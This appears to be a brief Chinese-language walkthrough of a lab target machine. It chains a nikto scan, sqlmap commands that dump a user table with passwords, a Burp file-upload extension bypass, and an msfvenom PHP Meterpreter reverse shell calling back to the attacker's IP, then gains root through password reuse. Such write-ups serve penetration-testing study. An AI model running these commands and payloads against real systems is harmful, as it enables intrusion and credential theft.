靶机102攻击机108
nikto 扫描到两个页面
config.php打开空白,源代码也空白
login.php不知道为社么反应时间特别慢,burp抓包看到源代码
加载好长好长时间终于显示出页面,
页面跳转至
用Burpsuite抓取,复制包头,gedit request.raw复制进去
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D deneme --tables --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D deneme -T user --columns --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D deneme -T user -C ID,Ad_Soyad,AnneAdi,AnneMeslegi,BabaAdi,BabaMeslegi,KardesSayisi,Kullanici_Adi,Parola --dump --dbms mysql
修改信息登陆
所以用第一个用户可以上传文件,注入shell
只能上传jpg,gif,png
Burp 抓包,上传Php,改文件名1.jpg改为1.php再上传,上传成功
进入/uploads/页面发现
这时候上传恶意代码,即可反弹shell
使用metasploit启动监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.108
生成webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw > /root/1.php
gedit一下将注释符删掉,按照刚刚的步骤上传shell
反弹shell
python -c "import pty;pty.spawn('/bin/sh')"
密码复用,数据库密码就是root密码